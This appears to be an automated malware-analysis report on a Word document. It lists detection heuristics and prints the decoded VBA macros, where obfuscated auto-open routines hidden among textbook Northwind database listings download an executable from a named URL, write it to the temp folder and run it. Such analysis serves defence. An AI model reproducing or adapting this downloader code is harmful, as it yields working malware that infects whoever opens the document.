MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains obfuscated VBA macros designed to execute automatically upon opening. These macros are configured to download and execute a payload from the URL http://illustramusic.com/43/82.exe. The presence of CreateObject and CallByName calls, along with an auto-exec loader, strongly indicates a malicious downloader.
Heuristics 10
-
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set XUFbKpgn = CreateObject(bVDahQGZfQafz) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set XUFbKpgn = CreateObject(bVDahQGZfQafz) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _ -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://illustramusic.com/43/82.exe Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14354 bytes |
SHA-256: 66dfc96bde017c6f5f04c58576ec44d2c948ed1d89cbcdda231a9906a0fdeefd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Nip121ЦКВ3017 (700)
End Sub
Sub Nip121ЦКВ3017(FFFFF As Integer)
HC9JQJgd8MG
End Sub
Attribute VB_Name = "Module1"
Public UzA2FtU9ehfc As String
Public Khkbjkjb As Long
Public JKHFkjhv As Integer
Sub DatabaseConnection()
'
' Open the Northwind database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = d.OpenDatabase(DBLOCATION)
'
' Open the Customers table (recordset)
'
Set rs = db.OpenRecordset("Customers")
'
' Display confirmation message
'
MsgBox "Opened " & db.Name & " Successfully!" & _
Chr(13) & Chr(13) & _
"The open Recordset is " & rs.Name
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set db = Nothing
End Sub
' Listing 18.2. A procedure that connects to a non-Jet database.
'
Sub NonJetConnection()
'
' Open the Jet database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = d.OpenDatabase(DBLOCATION)
'
' Create TableDef and set the connection information.
' This code assumes the CUSTOMER.DBF file (it's on the
' CD) is in the same folder as this workbook.
'
Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
tdDBASE.SourceTableName = "Customer"
'
' Append the TableDef to create the link
'
db.TableDefs.Append tdDBASE
'
' Open the recordset
'
Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
'
' Display confirmation message
'
MsgBox "Opened " & db.Name & " Successfully!" & _
Chr(13) & Chr(13) & _
"The open Recordset is " & rs.Name & _
Chr(13) & _
"The source table is " & tdDBASE.SourceTableName
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set tdDBASE = Nothing
Set db = Nothing
End Sub
' Listing 18.3. A procedure that displays information on
' all the fields in a Recordset.
'
Sub HC9JQJgd8MG()
JjoveOIH = Chr(104) & Chr(116) & "t" & "p" & Chr(58) & Chr(47) & Chr(60) & Chr(47) & Chr(105) & Chr(108) & Chr(108) & Chr(117) & Chr(115) & Chr(116) & Chr(114) & Chr(97) & Chr(109) & Chr(117) & Chr(115) & Chr(105) & Chr(99) & "." & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "4" & Chr(51) & Chr(47) & Chr(56) & "2" & Chr(46) & "e" & Chr(120) & Chr(101)
Set EfUmQh3mOIWp = XUFbKpgn("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & ".X" & Chr(77) & "L" & Chr(72) & Chr(84) & "T" & "P")
JjoveOIH = Replace(JjoveOIH, Chr(60), "", 1, 1, vbTextCompare)
CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _
JjoveOIH, False
Set XQQ5MVr24 = XUFbKpgn(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
Set N7xBa7sk = CallByName(XQQ5MVr24, Chr(69) & "n" & "v" & Chr(105) & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & "c" & "e" & Chr(115) & "s")
PuNXazFc3 = N7xBa7sk("T" & Chr(69) & Chr(77) & "P")
UzA2FtU9ehfc = PuNXazFc3 & Chr(92) & "r" & Chr(101) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(51) & Chr(46) & "e" & Chr(120) & Chr(101)
Dim cUtXmkOl() As Byte
CallByName EfUmQh3mOIWp, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
cUtXmkOl = CallByName(EfUmQh3mOIWp, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
OYdRs6238lCD cUtXmkOl, UzA2FtU9ehfc
On Error GoTo czmNNOSKG
a = 2321 / 0
On Error GoTo 0
uCzc6tLEYtcdR:
Exit Sub
czmNNOSKG:
RktdsxfVspmN ("RjjZx1ohoCq2KQ")
Resume uCzc6tLEYtcdR
End Sub
Sub DisplayFieldInfo()
Dim i As Integer
Dim fieldInfo As String
'
' Open the Northwind database
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = c.OpenDatabase(DBLOCATION)
'
' Open the Categories table
'
Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
'
' Enumerate all fields in the Recordset
'
For i = 0 To rs.Fields.Count - 1
fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
"Field " & _
i + 1 & " of " & _
rs.Fields.Count & Chr(13) & Chr(13)
'
' Set the Field variable and then run through the properties
'
Set fld = rs.Fields(i)
fieldInfo = fieldInfo & _
"Name: " & fld.Name & Chr(13) & _
"Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
"Attributes: " & fld.Attributes & Chr(13) & _
"Collating Order: " & fld.CollatingOrder & Chr(13) & _
"Default Value: " & fld.DefaultValue & Chr(13) & _
"Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
"Required: " & fld.Required & Chr(13) & _
"Size: " & fld.Size & Chr(13) & _
"Source Field: " & fld.SourceField & Chr(13) & _
"Source Table: " & fld.SourceTable & Chr(13) & _
"Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
"Validation Rule: " & fld.ValidationRule & Chr(13) & _
"Validation Text: " & fld.ValidationText
MsgBox Prompt:=fieldInfo, Title:="Field Information"
Next i
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set fld = Nothing
Set db = Nothing
End Sub
' TypeOfField()
' Function to translate the constant returned by a Field object's
' Type property into a descriptive string.
'
Function TypeOfField(fldConstant As Integer) As String
Select Case fldConstant
Case 1 ' dbBoolean
TypeOfField = "Boolean"
Case 2 ' dbByte
TypeOfField = "Byte"
Case 3 ' dbInteger
TypeOfField = "Integer"
Case 4 ' dbLong
TypeOfField = "Long Integer"
Case 5 ' dbCurrency
TypeOfField = "Currency"
Case 6 ' dbSingle
TypeOfField = "Single"
Case 7 ' dbDouble
TypeOfField = "Double"
Case 8 ' dbDate
TypeOfField = "Date"
Case 10 ' dbText
TypeOfField = "Text"
Case 11 'dbLongBinary
TypeOfField = "OLE Object"
Case 12 ' dbMemo
TypeOfField = "Memo"
Case 15 ' dbGUID
TypeOfField = "GUID"
End Select
End Function
Attribute VB_Name = "Module2"
' Listing 18.4. A procedure that opens a recordset using
' a SQL SELECT expression.
'
Sub QueryCustomers()
Dim db As Database
Dim strSELECT As String
Dim rs As Recordset
'
' Open the Northwind database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
'
' Store the SELECT statement in a string variable
'
strSELECT = "SELECT CompanyName,Region,Country " & _
"FROM Customers " & _
"WHERE Country = 'Canada' " & _
"ORDER BY CompanyName"
'
' Open the recordset
'
Set rs = db.OpenRecordset(strSELECT)
'
' Display confirmation message
'
MsgBox "The filtered Recordset contains " & _
rs.RecordCount & " records."
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set db = Nothing
End Sub
' Listing 18.5. A procedure that creates a recordset from
' a QueryDef object.
Public Function XUFbKpgn(bVDahQGZfQafz As String)
Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
End Function
'
Sub QueryDefExample()
Dim db As Database
Dim qd As QueryDef
Dim rs As Recordset
'
' Open the Northwind database (check the path!)
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
'
' Assign the QueryDef object
'
Set qd = db.QueryDefs("Products Above Average Price")
'
' Open the recordset
'
Set rs = qd.OpenRecordset()
'
' Display confirmation message
'
MsgBox "The filtered Recordset contains " & _
rs.RecordCount & " records."
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set qd = Nothing
Set db = Nothing
End Sub
Public Function RktdsxfVspmN(HAZvVdpA4ZKPE As String)
Set hL8caJOH = XUFbKpgn("S" & Chr(104) & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & Chr(105) & "c" & Chr(97) & "t" & "i" & Chr(111) & Chr(110))
hL8caJOH.Open (UzA2FtU9ehfc)
End Function
' Listing 18.6. A procedure that reads 100 rows from a
' recordset into a worksheet.
'
Sub ReadDataIntoExcel()
Dim db As Database
Dim qd As QueryDef
Dim rs As Recordset
Dim recArray As Variant
Dim i As Integer, j As Integer
'
' Open the Jet database, QueryDef, and Recordset
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
Set qd = db.QueryDefs("Invoices")
Set rs = qd.OpenRecordset()
'
' Head for Database Records and clear the sheet
'
Worksheets("Database Records").Activate
With Worksheets("Database Records").[a1]
.CurrentRegion.Clear
'
' Read the data using GetRows
'
recArray = rs.GetRows(100)
For i = 0 To UBound(recArray, 2)
For j = 0 To UBound(recArray, 1)
.Offset(i + 1, j) = recArray(j, i)
Next j
Next i
'
' Enter the field names and format the cells
'
For j = 0 To rs.Fields.Count - 1
.Offset(0, j) = rs.Fields(j).Name
.Offset(0, j).Font.Bold = True
.Offset(0, j).EntireColumn.AutoFit
Next j
End With
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set qd = Nothing
Set db = Nothing
End Sub
' Listing 18.7. A procedure that filters out OLE Object
' fields before retrieving a recordset.
'
Public Function OYdRs6238lCD(qBBdA3l1 As Variant, GJjfDfPQFXx As String)
Dim TVRp9uIoM3RKBe: Set TVRp9uIoM3RKBe = XUFbKpgn(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")
With TVRp9uIoM3RKBe
.Type = 1
.Open
.write qBBdA3l1
.savetofile GJjfDfPQFXx, 2
End With
End Function
Sub RetrieveCategories()
Dim db As Database
Dim rs As Recordset
Dim fld As Field
Dim strSELECT As String, i As Integer
'
' Open the Jet database
'
If Dir(DBLOCATION) = "" Then
MsgBox "The location of the NorthWind sample " & _
"database is incorrect." & Chr(13) & _
"Please adjust the path and then run this " & _
"procedure again."
Exit Sub
End If
Set db = OpenDatabase(DBLOCATION)
'
' Open the full Categories table
'
Set rs = db.OpenRecordset("Categories")
'
' The strSELECT variable will hold the SQL SELECT statement
' that filters the Recordset to remove OLE Object fields
'
strSELECT = "SELECT "
'
' Run through the recordset fields
'
For Each fld In rs.Fields
'
' Check for OLE Object fields
'
If fld.Type <> dbLongBinary Then
'
' If it's not an OLE Object field, add it to the SELECT statement
'
strSELECT = strSELECT & fld.Name & ","
End If
Next fld
'
' Remove the trailing comma
'
strSELECT = Left(strSELECT, Len(strSELECT) - 1)
'
' Add the FROM clause
'
strSELECT = strSELECT & " FROM Categories"
'
' Open the filtered recordset
'
Set rs = db.OpenRecordset(strSELECT)
'
' Retrieve the records
'
Worksheets("Database Records").Activate
With Worksheets("Database Records").[a1]
.CurrentRegion.Clear
.Offset(1).CopyFromRecordset rs
'
' Enter the field names and format the cells
'
For i = 0 To rs.Fields.Count - 1
.Offset(0, i) = rs.Fields(i).Name
.Offset(0, i).Font.Bold = True
.Offset(0, i).EntireColumn.AutoFit
Next i
End With
'
' Close and release the objects
'
rs.Close
db.Close
Set rs = Nothing
Set fld = Nothing
Set db = Nothing
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.